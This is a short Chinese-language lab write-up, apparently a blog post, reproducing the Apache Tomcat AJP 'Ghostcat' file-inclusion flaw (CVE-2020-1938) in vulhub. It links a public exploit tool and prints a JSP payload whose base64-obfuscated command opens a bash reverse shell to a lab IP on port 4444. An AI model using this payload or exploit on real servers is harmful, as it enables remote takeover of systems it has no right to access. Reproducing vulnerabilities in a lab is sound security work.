vulhub中Aapache Tomcat AJP 文件包含漏洞复现(CVE-2020-1938)

查看tomcat默认页面,此时通过AJP协议的8009端口亦可访问Tomcat。

利用如下工具均可测试漏洞:

工具需要用到python2,

如果需要进一步利用需要向服务器的/webapps/ROOT目录下上传恶意文件

复制代码
<%Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS40My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}");%>

利用工具https://github.com/00theway/Ghostcat-CNVD-2020-10487

进行执行上传的恶意文件

相关推荐
阿乾之铭18 分钟前
Spring Boot 参数验证
java·数据库·mysql
佩奇的技术笔记20 分钟前
Java学习手册:微服务设计原则
java·微服务
jiunian_cn22 分钟前
【c++】异常详解
java·开发语言·数据结构·c++·算法·visual studio
柯南二号26 分钟前
【后端】SpringBoot用CORS解决无法跨域访问的问题
java·spring boot·后端
purrrew2 小时前
【Java ee初阶】初始网络
java·网络
程序员Bears2 小时前
从零打造个人博客静态页面与TodoList应用:前端开发实战指南
java·javascript·css·html5
Helibo442 小时前
GESPC++六级复习
java·数据结构·算法
柒七爱吃麻辣烫3 小时前
在Linux中安装JDK并且搭建Java环境
java·linux·开发语言
极小狐3 小时前
极狐GitLab 容器镜像仓库功能介绍
java·前端·数据库·npm·gitlab
努力的搬砖人.4 小时前
如何让rabbitmq保存服务断开重连?保证高可用?
java·分布式·rabbitmq